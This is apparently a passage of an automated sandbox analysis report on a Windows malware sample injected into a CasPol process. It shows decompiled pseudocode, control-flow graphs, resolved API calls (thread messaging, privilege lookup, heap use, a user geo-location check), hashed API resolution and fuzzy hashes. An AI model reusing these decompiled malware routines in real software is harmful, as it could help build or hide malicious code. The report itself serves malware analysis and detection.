                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 107 409913-409924 108 40992d-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 107->108 109 409928 call 4201d3 107->109 119 4099a0-4099a6 108->119 120 409969-40997a PostThreadMessageW 108->120 109->108 120->119 121 40997c-40999d call 40c663 120->121 121->119
                                                                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                                			E00409913(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                                                                                                                				char _v67;
                                                                                                                                                                                                                                                                                                				char _v68;
                                                                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                                                                                				int _t27;
                                                                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t32 = __eflags;
                                                                                                                                                                                                                                                                                                				_v68 = 0;
                                                                                                                                                                                                                                                                                                				E004201D3( &_v67, 0, 0x3f);
                                                                                                                                                                                                                                                                                                				E00420C83( &_v68, 3);
                                                                                                                                                                                                                                                                                                				_t19 = _a4;
                                                                                                                                                                                                                                                                                                				_t13 = E0040CF93(_t32, _a4 + 0x20,  &_v68); // executed
                                                                                                                                                                                                                                                                                                				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
                                                                                                                                                                                                                                                                                                				_t27 = _t15;
                                                                                                                                                                                                                                                                                                				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                                					_t25 = _a8;
                                                                                                                                                                                                                                                                                                					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                                                                						return  *_t27(_t25, 0x8003, _t28 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t15;
                                                                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                                                                                                                                                                                                                                                • Instruction ID: 99f33223a06979dd19497cd07b2eb0eced799e52382c08ed34ba0aba74cfe4fe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB01C871A4031476E721A691DC82FEF376C9B44B44F44012AFE04BA2C2D6A8690586E9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 124 41e9f4-41e9f8 125 41e9c0-41e9f3 call 41f203 124->125 126 41e9fb-41ea1d call 41f203 124->126 130 41ea22-41ea37 LookupPrivilegeValueW 126->130
                                                                                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                			E0041E9F4(void* __eax, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                                                                                				int _t13;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				asm("stc");
                                                                                                                                                                                                                                                                                                				asm("out dx, al");
                                                                                                                                                                                                                                                                                                				asm("repne jo 0xffffffc8");
                                                                                                                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                                                                                                                				_t10 = _v0;
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_v0 + 0x6d4)), _t10, _t10 + 0xab8,  *((intOrPtr*)(_v0 + 0x6d4)), 0, 0x46);
                                                                                                                                                                                                                                                                                                				_t13 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                                                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                                                                                                                                                                                                                                                • Instruction ID: 37147ff059de123ca1daa7b680345aa8e6bf5e2ed93d8c122108e99bdf0e5716
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D30169B66002086FDB14EF99DC81EEB37ADAF89354F058159FE0997242C235E8558BF0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 132 4099a7-4099aa 133 409930-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 132->133 134 4099ac-4099b2 132->134 143 4099a0-4099a6 133->143 144 409969-40997a PostThreadMessageW 133->144 144->143 145 40997c-40999d call 40c663 144->145 145->143
                                                                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                			E004099A7(void* __eax, void* __ebx, void* __edx, signed int __esi, intOrPtr _a8, int _a12, char* _a16) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                                                                				char* _v132;
                                                                                                                                                                                                                                                                                                				char* _v136;
                                                                                                                                                                                                                                                                                                				char _v656;
	char* _v668;
	char _v688;
	char* _v692;
	intOrPtr __edi;
	void* _t64;
	int _t66;
	char* _t73;
	long _t79;
	int _t82;
	signed int _t84;

	_t84 = __esi * 0xffffffef;
	_t90 = _t84;
	if(_t84 > 0) {
		E00420C83(_t73, 3);
		_t70 = _a8;
		_t64 = E0040CF93(_t90, _a8 + 0x20,  &_v64); // executed
		_t66 = E004195B3(_a8 + 0x20, _t64, 0, 0, E00402E93(0xe49e13e4));
		_t82 = _t66;
		if(_t82 != 0) {
			_t79 = _a12;
			_t66 = PostThreadMessageW(_t79, 0x111, 0, 0); // executed
			if(_t66 == 0) {
				_t66 =  *_t82(_t79, 0x8003, _t84 + (E0040C663(1, 8, _t70 + 0x39c) & 0x000000ff) - 0x40, _t66);
			}
		}
		return _t66;
	} else {
		__eax = __eax + 0x90e7dfc8;
		__ebx = __ebx + 1;
		__eflags = __ebx;
		_push(__edx);
		_push(__ebp);
		__ebp = __esp;
		__esp = __esp - 0x2ac;
		_push(__ebx);
		_push(__esi);
		_push(__edi);
		__eax = 0;
		_v12 = 0;
		_v692 = 0;
		 &_v688 = E004201D3( &_v688, 0, 0x2a4);
		__esi = _a12;
		__ecx =  *((intOrPtr*)(__esi + 0x300));
		__edi = _v0;
		__eax = E00409913(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
		__eax = E0041FA23(__ecx);
		_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
		__ebx = __eax + _t15;
		_a12 = 0;
		while(1) {
			__eax = E00410363(__edi, 0xfe363c80); // executed
			__ecx =  *((intOrPtr*)(__esi + 0x2f4));
			__eax =  &_v688;
			__eax = E0041E733(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
			 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
			__eflags = __eax;
			if(__eax < 0) {
				break;
			}
			__eflags = _v656;
			if(_v656 == 0) {
				L12:
				__eax = _a16;
				__eax = _a16 + 1;
				_a16 = __eax;
				__eflags = __eax - 2;
				if(__eax < 2) {
					continue;
				} else {
					__ebx = _v8;
					goto L16;
				}
			} else {
				__eflags = _v668;
				if(_v668 == 0) {
					goto L12;
				} else {
					__eflags = _v136;
					if(_v136 == 0) {
						goto L12;
					} else {
						__eflags = _v132;
						if(_v132 != 0) {
							__eax = _a12;
							__edx =  &_v688;
							__ebx = 1;
							__eax = E00420153(_a12,  &_v688, 0x2a8);
							L16:
							__ecx =  *((intOrPtr*)(__esi + 0x2f4));
							__eax = E0041E6C3(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
							__eflags = __ebx;
							if(__ebx == 0) {
								break;
							} else {
								__edx = _v668;
								__eax = _a12;
								__ecx = _v136;
								 *((intOrPtr*)(_a12 + 0x14)) = _v668;
								__edx =  *((intOrPtr*)(__esi + 0x2d0));
								_t35 = __esi + 0x2e8; // 0x2e8
								__eax = _t35;
								 *_t35 = _v136;
								__eax = _a12;
								_t37 = __esi + 0x314; // 0x314
								__ebx = _t37;
								__ecx = 0;
								__eax = _a12 + 0x220;
								 *__ebx = 0x18;
								 *((intOrPtr*)(__esi + 0x318)) = 0;
								 *((intOrPtr*)(__esi + 0x320)) = 0;
								 *((intOrPtr*)(__esi + 0x31c)) = 0;
								 *((intOrPtr*)(__esi + 0x324)) = 0;
								 *((intOrPtr*)(__esi + 0x328)) = 0;
								__eax = E0041DF43(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
                                                                                                                                                                                                                                                                                                											__ecx = 0;
                                                                                                                                                                                                                                                                                                											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                                                                                                                                                                                                                                                											__eflags = __eax;
                                                                                                                                                                                                                                                                                                											if(__eax < 0) {
                                                                                                                                                                                                                                                                                                												break;
                                                                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                                                                												__edx = _v132;
                                                                                                                                                                                                                                                                                                												_t45 = __esi + 0x2e0; // 0x2e0
                                                                                                                                                                                                                                                                                                												__eax = _t45;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                                                                                                                                                                                                                                                												_a12 = _a12 + 0x224;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
                                                                                                                                                                                                                                                                                                												 *__ebx = 0x18;
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
                                                                                                                                                                                                                                                                                                												__eax = E0041DF83(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                                                                                                                                                                                                                                                												__eflags = __eax;
                                                                                                                                                                                                                                                                                                												if(__eax < 0) {
                                                                                                                                                                                                                                                                                                													break;
                                                                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                                                                													__edx = _a8;
                                                                                                                                                                                                                                                                                                													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                                                                                                                                                                                                                                                                                													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                                                                                                                                                                                                                                                                                													__eax = E0041F6C3(__ecx);
                                                                                                                                                                                                                                                                                                													__ebx = __eax;
                                                                                                                                                                                                                                                                                                													__eax =  *((intOrPtr*)(__ebx + 0x28));
                                                                                                                                                                                                                                                                                                													__eax = E00420373( *((intOrPtr*)(__ebx + 0x28)));
                                                                                                                                                                                                                                                                                                													__edx =  *((intOrPtr*)(__ebx + 0x28));
                                                                                                                                                                                                                                                                                                													_t60 = __eax + 2; // 0x2
                                                                                                                                                                                                                                                                                                													__ecx = __eax + _t60;
                                                                                                                                                                                                                                                                                                													__eax = E00420153(__esi,  *((intOrPtr*)(__ebx + 0x28)), __eax + _t60);
                                                                                                                                                                                                                                                                                                													__eax =  &_v656;
                                                                                                                                                                                                                                                                                                													_push( &_v656);
                                                                                                                                                                                                                                                                                                													__eax = E004191A3(); // executed
                                                                                                                                                                                                                                                                                                													__esp = __esp + 0x28;
                                                                                                                                                                                                                                                                                                													__edi = __edi;
                                                                                                                                                                                                                                                                                                													_pop(__esi);
                                                                                                                                                                                                                                                                                                													__ebx = 2;
                                                                                                                                                                                                                                                                                                													__esp = __ebp;
                                                                                                                                                                                                                                                                                                													__ebp = 0;
                                                                                                                                                                                                                                                                                                													return __eax;
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                                                                										goto L12;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_pop(__edi);
                                                                                                                                                                                                                                                                                                					_pop(__esi);
                                                                                                                                                                                                                                                                                                					__eax = 0;
                                                                                                                                                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                                                                                                                                                					_pop(__ebx);
                                                                                                                                                                                                                                                                                                					__esp = __ebp;
                                                                                                                                                                                                                                                                                                					_pop(__ebp);
                                                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				L20:
                                                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                                                0x004099fd
                                                                                                                                                                                                                                                                                                0x004099fd
                                                                                                                                                                                                                                                                                                0x00409a04
                                                                                                                                                                                                                                                                                                0x00409a13
                                                                                                                                                                                                                                                                                                0x00409a19
                                                                                                                                                                                                                                                                                                0x00409a1e
                                                                                                                                                                                                                                                                                                0x00409a2b
                                                                                                                                                                                                                                                                                                0x00409a35
                                                                                                                                                                                                                                                                                                0x00409a3d
                                                                                                                                                                                                                                                                                                0x00409a43
                                                                                                                                                                                                                                                                                                0x00409a45
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a47
                                                                                                                                                                                                                                                                                                0x00409a4f
                                                                                                                                                                                                                                                                                                0x00409a69
                                                                                                                                                                                                                                                                                                0x00409a69
                                                                                                                                                                                                                                                                                                0x00409a6c
                                                                                                                                                                                                                                                                                                0x00409a6d
                                                                                                                                                                                                                                                                                                0x00409a70
                                                                                                                                                                                                                                                                                                0x00409a73
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a75
                                                                                                                                                                                                                                                                                                0x00409a75
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a75
                                                                                                                                                                                                                                                                                                0x00409a51
                                                                                                                                                                                                                                                                                                0x00409a51
                                                                                                                                                                                                                                                                                                0x00409a58
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a5a
                                                                                                                                                                                                                                                                                                0x00409a5a
                                                                                                                                                                                                                                                                                                0x00409a61
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a63
                                                                                                                                                                                                                                                                                                0x00409a63
                                                                                                                                                                                                                                                                                                0x00409a67
                                                                                                                                                                                                                                                                                                0x00409a83
                                                                                                                                                                                                                                                                                                0x00409a8b
                                                                                                                                                                                                                                                                                                0x00409a93
                                                                                                                                                                                                                                                                                                0x00409a98
                                                                                                                                                                                                                                                                                                0x00409aa0
                                                                                                                                                                                                                                                                                                0x00409aa0
                                                                                                                                                                                                                                                                                                0x00409aa8
                                                                                                                                                                                                                                                                                                0x00409ab0
                                                                                                                                                                                                                                                                                                0x00409ab2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409ab4
                                                                                                                                                                                                                                                                                                0x00409ab4
                                                                                                                                                                                                                                                                                                0x00409aba
                                                                                                                                                                                                                                                                                                0x00409abd
                                                                                                                                                                                                                                                                                                0x00409ac3
                                                                                                                                                                                                                                                                                                0x00409ac6
                                                                                                                                                                                                                                                                                                0x00409acc
                                                                                                                                                                                                                                                                                                0x00409acc
                                                                                                                                                                                                                                                                                                0x00409ad3
                                                                                                                                                                                                                                                                                                0x00409ad5
                                                                                                                                                                                                                                                                                                0x00409ad8
                                                                                                                                                                                                                                                                                                0x00409ad8
                                                                                                                                                                                                                                                                                                0x00409adf
                                                                                                                                                                                                                                                                                                0x00409ae2
                                                                                                                                                                                                                                                                                                0x00409ae9
                                                                                                                                                                                                                                                                                                0x00409aef
                                                                                                                                                                                                                                                                                                0x00409af5
                                                                                                                                                                                                                                                                                                0x00409afb
                                                                                                                                                                                                                                                                                                0x00409b01
                                                                                                                                                                                                                                                                                                0x00409b07
                                                                                                                                                                                                                                                                                                0x00409b0d
                                                                                                                                                                                                                                                                                                0x00409b12
                                                                                                                                                                                                                                                                                                0x00409b17
                                                                                                                                                                                                                                                                                                0x00409b1d
                                                                                                                                                                                                                                                                                                0x00409b1f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409b25
                                                                                                                                                                                                                                                                                                0x00409b25
                                                                                                                                                                                                                                                                                                0x00409b28
                                                                                                                                                                                                                                                                                                0x00409b28
                                                                                                                                                                                                                                                                                                0x00409b2f
                                                                                                                                                                                                                                                                                                0x00409b35
                                                                                                                                                                                                                                                                                                0x00409b3b
                                                                                                                                                                                                                                                                                                0x00409b41
                                                                                                                                                                                                                                                                                                0x00409b47
                                                                                                                                                                                                                                                                                                0x00409b53
                                                                                                                                                                                                                                                                                                0x00409b5b
                                                                                                                                                                                                                                                                                                0x00409b61
                                                                                                                                                                                                                                                                                                0x00409b67
                                                                                                                                                                                                                                                                                                0x00409b71
                                                                                                                                                                                                                                                                                                0x00409b79
                                                                                                                                                                                                                                                                                                0x00409b7f
                                                                                                                                                                                                                                                                                                0x00409b81
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409b87
                                                                                                                                                                                                                                                                                                0x00409b87
                                                                                                                                                                                                                                                                                                0x00409b8d

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                • Opcode ID: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                                                                                                                                                                                                                                                • Instruction ID: 648afeff1364fdba1a395c652430271767a4361657bae9f95ab056a44fdb6ef5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D201A7B2A4031476E6215651EC83FAF2358DB84B14F14412EFE04BA2C2D5EDAD0546E9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 186 41e863-41e894 call 41f203 RtlAllocateHeap
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E863(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t3 = _a4 + 0xa9c; // 0xa9c
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                                                                                                                                                                                                                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                				return _t10;
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E890
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                • Instruction ID: 141f3d952d026ec1b8dbe03c6c75eaaf96d710a32fd8771451468f3a68ee1817
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C630F914CAF1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 181 4100c3-4100e7 call 4195b3 184 4100e9-4100ea 181->184 185 4100eb-4100fc GetUserGeoID 181->185
                                                                                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                			E004100C3(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				intOrPtr* _t7;
                                                                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                                                                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                                                                                                                					_t8 =  *_t7(0x10); // executed
                                                                                                                                                                                                                                                                                                					return 0 | _t8 == 0x000000f1;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					return _t7;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: User
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 765557111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                                                                                                                                                                                                                                                • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 189 41e8a3-41e8b9 190 41e8bf-41e8d4 RtlFreeHeap 189->190 191 41e8ba call 41f203 189->191 191->190
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction ID: 81649b4115f882acd630a205a6666d0b6fa7ed995dd6d0d074ea88b8b0e80a3e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EE012B6600208ABCB14EF89DC49EA737ACAF88754F018059FE095B282C630E914CAB1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

